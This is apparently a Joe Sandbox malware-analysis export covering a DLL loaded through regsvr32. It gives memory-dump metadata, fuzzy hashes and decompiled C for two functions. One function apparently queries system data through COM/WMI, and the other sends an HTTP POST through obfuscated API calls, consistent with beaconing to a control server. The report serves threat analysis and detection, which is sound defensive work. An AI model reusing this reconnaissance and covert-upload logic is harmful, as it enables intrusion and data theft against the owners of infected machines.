Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9b7d850c72bdbd248a4fad2262f019243e036cd4cc05ab652092f67e4b4a3f
Instruction ID: 2ab4c32e301e0cbc28f9f85bf7547bddcd51548390bca997278a017b161bfc82
Opcode Fuzzy Hash: dc9b7d850c72bdbd248a4fad2262f019243e036cd4cc05ab652092f67e4b4a3f
Instruction Fuzzy Hash: 3321A1367150128BD71CCF2CD4A6A69F3A5FB49210F8542BED51BCBA82CB72E452CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC08C18, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.646502371.000000006CC08000.00000040.00020000.sdmp, Offset: 6CC08000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cc08000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: 00909a9a8b570eb368435368daf55976e09b0d10b3042256b8262bc36a2f2fbe
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: FC01D636746244CFDB08CB19D8D4D69B7F4EBC6328B29C07FC44687A15E231E845CA10

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0DB7E, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6CB0DB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E6CB0D565(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E6CB085E5(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E6CB085FB( &_v60, 0xfffffffe);
					E6CB0D619( &_v104);
					return _t320;
				}
				_t165 = E6CB095C2(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E6CB095C2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E6CB092C6(_t165);
				_v60 = _t322;
				E6CB085B6( &_v52);
				E6CB085B6( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E6CB095C2(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E6CB085B6( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E6CB085FB( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E6CB091C4(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E6CB091C4(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E6CB08679(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E6CB085E5( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E6CB085FB(_t136, 0);
								E6CB085FB( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E6CB091C4(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E6CB095C2(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E6CB095C2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E6CB085E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E6CB085B6( &_v92);
											E6CB085B6( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E6CB09621();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E6CB085E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E6CB095C2(_t283, 0x219);
										E6CB09621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E6CB085B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E6CB091C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E6CB0DA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E6CB085FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x6cb0db87
0x6cb0db8d
0x6cb0db94
0x6cb0db97
0x6cb0db9a
0x6cb0db9f
0x6cb0dba1
0x6cb0dba6
0x6cb0dfee
0x6cb0dfee
0x6cb0dbb3
0x6cb0dbb5
0x6cb0dbb8
0x6cb0dbbb
0x6cb0dfd3
0x6cb0dfd9
0x6cb0dfe3
0x00000000
0x6cb0dfe8
0x6cb0dbc6
0x6cb0dbcd
0x6cb0dbd4
0x6cb0dbd7
0x6cb0dbdc
0x6cb0dbde
0x6cb0dbe1
0x6cb0dbe4
0x6cb0dbe5
0x6cb0dbee
0x6cb0dbf4
0x6cb0dbf7
0x6cb0dc00
0x6cb0dc05
0x6cb0dc0a
0x6cb0dc21
0x6cb0dc2e
0x6cb0dc31
0x6cb0dc38
0x6cb0dc3d
0x6cb0dc44
0x6cb0dc49
0x6cb0dc50
0x6cb0dc52
0x6cb0dc5e
0x6cb0dc61
0x6cb0dc63
0x6cb0dfc3
0x6cb0dfc4
0x6cb0dfcd
0x00000000
0x6cb0dfcd
0x6cb0dc69
0x6cb0dc6c
0x6cb0dc6f
0x6cb0dc72
0x6cb0dc74
0x6cb0df8f
0x6cb0df92
0x6cb0df95
0x6cb0df97
0x6cb0dfb9
0x6cb0dfbe
0x6cb0df99
0x6cb0df9c
0x6cb0dfa7
0x6cb0dfae
0x6cb0dfae
0x00000000
0x00000000
0x00000000
0x00000000
0x6cb0dc7a
0x6cb0dc7a
0x6cb0dc8c
0x6cb0dc8f
0x6cb0dc91
0x00000000
0x00000000
0x6cb0dc99
0x6cb0dc9c
0x6cb0dc9f
0x6cb0dca2
0x6cb0dca5
0x6cb0dca8
0x00000000
0x00000000
0x6cb0dcae
0x6cb0dcbc
0x6cb0dcbf
0x6cb0dcc1
0x6cb0dcda
0x6cb0dce9
0x6cb0dcf1
0x6cb0dcf1
0x6cb0dcf4
0x6cb0dcfb
0x6cb0dcff
0x6cb0dd05
0x6cb0dd07
0x6cb0df77
0x6cb0df7d
0x6cb0df83
0x6cb0df86
0x6cb0df86
0x00000000
0x6cb0df86
0x6cb0dd16
0x6cb0dd2a
0x6cb0dd2e
0x6cb0dd30
0x6cb0dd35
0x6cb0df44
0x6cb0df4a
0x6cb0df55
0x6cb0df60
0x6cb0df66
0x6cb0df6c
0x6cb0df6f
0x00000000
0x6cb0df6f
0x6cb0dd3b
0x6cb0df12
0x6cb0df12
0x6cb0df15
0x6cb0df18
0x00000000
0x00000000
0x6cb0dd43
0x6cb0dd4b
0x6cb0dd52
0x6cb0dd58
0x6cb0dd5a
0x00000000
0x00000000
0x6cb0dd63
0x6cb0dd78
0x6cb0dd7e
0x6cb0dd87
0x6cb0dd8a
0x6cb0dd8d
0x6cb0dd8f
0x6cb0df05
0x6cb0df08
0x6cb0df11
0x6cb0df11
0x00000000
0x6cb0df11
0x6cb0dd9f
0x6cb0dda2
0x6cb0dda9
0x6cb0ddaf
0x6cb0ddb2
0x6cb0ddb5
0x6cb0ddb8
0x6cb0ddbb
0x6cb0ddf7
0x6cb0ddf7
0x6cb0ddfa
0x6cb0dea6
0x6cb0deba
0x6cb0deca
0x6cb0dece
0x6cb0ded0
0x6cb0dee7
0x6cb0deeb
0x6cb0def4
0x6cb0deff
0x00000000
0x6cb0deff
0x6cb0ded6
0x6cb0ded7
0x6cb0dedc
0x6cb0dedc
0x6cb0dede
0x6cb0dedf
0x6cb0dee4
0x00000000
0x6cb0dee4
0x6cb0de00
0x6cb0de00
0x6cb0de03
0x6cb0de6e
0x6cb0de82
0x6cb0de92
0x6cb0de96
0x6cb0de98
0x00000000
0x00000000
0x6cb0de9e
0x6cb0de9f
0x00000000
0x6cb0de9f
0x6cb0de05
0x6cb0de05
0x6cb0de08
0x00000000
0x00000000
0x6cb0de0a
0x6cb0de0d
0x00000000
0x00000000
0x6cb0de0f
0x6cb0de0f
0x6cb0de15
0x6cb0de31
0x6cb0de40
0x6cb0de49
0x6cb0de4e
0x6cb0de51
0x6cb0de57
0x6cb0de57
0x6cb0de5c
0x6cb0de68
0x00000000
0x6cb0de68
0x6cb0de1a
0x00000000
0x6cb0de1a
0x6cb0ddbd
0x6cb0dde4
0x6cb0dde9
0x6cb0ddee
0x6cb0ddf0
0x6cb0ddf0
0x00000000
0x6cb0ddee
0x6cb0ddbf
0x6cb0ddbf
0x6cb0ddc2
0x00000000
0x00000000
0x6cb0ddc8
0x6cb0ddc8
0x6cb0ddcb
0x00000000
0x00000000
0x6cb0ddd1
0x6cb0ddd1
0x6cb0ddd4
0x00000000
0x00000000
0x6cb0ddda
0x6cb0dddd
0x00000000
0x00000000
0x6cb0dddf
0x00000000
0x6cb0dddf
0x6cb0df21
0x6cb0df27
0x6cb0df2d
0x6cb0df30
0x6cb0df33
0x6cb0df33
0x6cb0df36
0x6cb0df37
0x6cb0df3a
0x6cb0df3c
0x00000000
0x00000000
0x6cb0df8c
0x6cb0df8c
0x00000000
0x6cb0df8c
0x6cb0dcc3
0x6cb0dcc9
0x00000000
0x6cb0dcc9
0x6cb0df89
0x00000000
0x6cb0dc0c
0x6cb0dc11
0x6cb0dc16
0x00000000
0x6cb0dc1a

APIs

Part of subcall function 6CB0D565: CoInitializeEx.OLE32(00000000,00000000), ref: 6CB0D578
Part of subcall function 6CB0D565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 6CB0D589
Part of subcall function 6CB0D565: CoCreateInstance.OLE32(6CB1B848,00000000,00000001,6CB1B858,?), ref: 6CB0D5A0
Part of subcall function 6CB0D565: SysAllocString.OLEAUT32(00000000), ref: 6CB0D5AB
Part of subcall function 6CB0D565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6CB0D5D6

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

SysAllocString.OLEAUT32(00000000), ref: 6CB0DC27
SysAllocString.OLEAUT32(00000000), ref: 6CB0DC3B
SysFreeString.OLEAUT32(?), ref: 6CB0DFC4
SysFreeString.OLEAUT32(?), ref: 6CB0DFCD

Part of subcall function 6CB085FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 6CB08641

Strings

TRUE, xrefs: 6CB0DDE9
FALSE, xrefs: 6CB0DDF0

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 5b7d293ee4fb60900f7e4073c8fb25cdc0c0bc3fe107ed457be8c85c355b803b
Instruction ID: 4e1cf761e3d67455556bdaffd16824ef166e0a3b3e1566e02246e8e69869b325
Opcode Fuzzy Hash: 5b7d293ee4fb60900f7e4073c8fb25cdc0c0bc3fe107ed457be8c85c355b803b
Instruction Fuzzy Hash: 5CE15B71F00259AFDF04DFA4D884AEEBFB9FF09308F10855AE515A7A90DB31AA05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0E6AA, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6CB0E6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E6CB095A8(0x85b);
				_v60 = E6CB095A8(0xdc9);
				_v56 = E6CB095A8(0x65d);
				_v52 = E6CB095A8(0xdd3);
				_t105 = E6CB095A8(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E6CB0C3BB(_t214));
				_t113 =  *0x6cb1e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x6cb1e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x6cb1e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x6cb1e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x6cb1e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x6cb1e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x6cb1e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x6cb1e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E6CB097ED(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x6cb1e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E6CB097ED(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E6CB095A8(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x6cb1e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E6CB0C3BB(_t217), _a4, _a8);
										E6CB085A3( &_v12);
										if(_a24 != 0) {
											E6CB097ED(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x6cb1e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E6CB0972A( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x6cb1e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x6cb1e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x6cb1e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x6cb1e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x6cb1e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x6cb1e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x6cb1e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x6cb1e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x6cb0e6b3
0x6cb0e6c5
0x6cb0e6ce
0x6cb0e6d8
0x6cb0e6dc
0x6cb0e6ed
0x6cb0e704
0x6cb0e711
0x6cb0e71e
0x6cb0e72b
0x6cb0e72e
0x6cb0e733
0x6cb0e738
0x6cb0e73a
0x6cb0e742
0x6cb0e74d
0x6cb0e754
0x6cb0e760
0x6cb0e763
0x6cb0e771
0x6cb0e774
0x6cb0e77a
0x6cb0e77b
0x6cb0e77d
0x6cb0e786
0x6cb0e787
0x6cb0e78c
0x6cb0e792
0x6cb0e79c
0x6cb0e79e
0x6cb0e7a3
0x6cb0e7a3
0x6cb0e7b2
0x6cb0e7c1
0x6cb0e7c5
0x6cb0e7d4
0x6cb0e7d7
0x6cb0e7dc
0x6cb0e7e0
0x6cb0e7e7
0x6cb0e7ee
0x6cb0e7f6
0x6cb0e7fe
0x6cb0e805
0x6cb0e80d
0x6cb0e815
0x6cb0e81c
0x6cb0e824
0x6cb0e82c
0x6cb0e841
0x6cb0e84e
0x6cb0e850
0x6cb0e855
0x6cb0e855
0x6cb0e85c
0x6cb0e86d
0x6cb0e872
0x6cb0e874
0x6cb0e874
0x6cb0e888
0x6cb0e89a
0x6cb0e89c
0x6cb0e89f
0x6cb0e8a4
0x6cb0e8a4
0x6cb0e8ab
0x6cb0e8ba
0x6cb0e8be
0x6cb0e8fc
0x6cb0e901
0x6cb0e909
0x6cb0e90e
0x6cb0e919
0x6cb0e91f
0x6cb0e929
0x6cb0e92c
0x6cb0e935
0x6cb0e93a
0x6cb0e93a
0x6cb0e943
0x6cb0e98c
0x6cb0e98e
0x6cb0e995
0x6cb0e996
0x6cb0e999
0x6cb0e99f
0x6cb0e9a3
0x6cb0e9a4
0x6cb0e9a9
0x6cb0e9ab
0x6cb0e9b1
0x6cb0e9c6
0x6cb0e9ce
0x6cb0ea03
0x6cb0ea08
0x6cb0ea0d
0x00000000
0x6cb0ea0f
0x6cb0e9d0
0x6cb0e9d2
0x6cb0e9d2
0x6cb0e9db
0x6cb0e9de
0x6cb0e9e0
0x6cb0e9e2
0x6cb0e9e8
0x6cb0e9e8
0x6cb0e9ed
0x6cb0e9ef
0x6cb0e9f6
0x6cb0e9f6
0x00000000
0x6cb0e9f9
0x6cb0e9b3
0x6cb0e9bb
0x00000000
0x6cb0e945
0x6cb0e945
0x6cb0e94b
0x6cb0e951
0x6cb0e954
0x00000000
0x6cb0e954
0x6cb0e943
0x6cb0e8c0
0x6cb0e8c6
0x6cb0e8ca
0x6cb0e8cb
0x6cb0e8d0
0x6cb0e8d2
0x6cb0e8d8
0x6cb0e8f6
0x6cb0e8f6
0x00000000
0x6cb0e8f6
0x6cb0e8da
0x6cb0e8e4
0x6cb0e8e6
0x6cb0e8e7
0x6cb0e8ec
0x6cb0e8ee
0x6cb0e8f4
0x00000000
0x00000000
0x00000000
0x6cb0e8ad
0x6cb0e8ad
0x6cb0e956
0x6cb0e956
0x6cb0e95c
0x6cb0e95f
0x00000000
0x6cb0e95f
0x6cb0e85e
0x6cb0e85e
0x6cb0e961
0x6cb0e961
0x6cb0e967
0x6cb0e96a
0x00000000
0x6cb0e96a
0x6cb0e85c
0x6cb0e7c7
0x6cb0e96c
0x6cb0e96f
0x6cb0e971
0x6cb0e974
0x6cb0e977
0x6cb0e980
0x6cb0e985
0x00000000
0x00000000
0x6cb0e989
0x00000000
0x6cb0e989
0x6cb0e796
0x00000000

APIs

memset.MSVCRT ref: 6CB0E6DC
memset.MSVCRT ref: 6CB0E6ED
memset.MSVCRT ref: 6CB0E742
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 6CB0E7C7

Strings

POST, xrefs: 6CB0E88D

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: f25d4951e7758c3f69da3f6c48813e30d85f150e9e2f1a2842195e031f7cba4e
Instruction ID: 4eb221dcf958b2d8d912895f69d4df36576f48bb8c43966a0bd209deaa375e7a
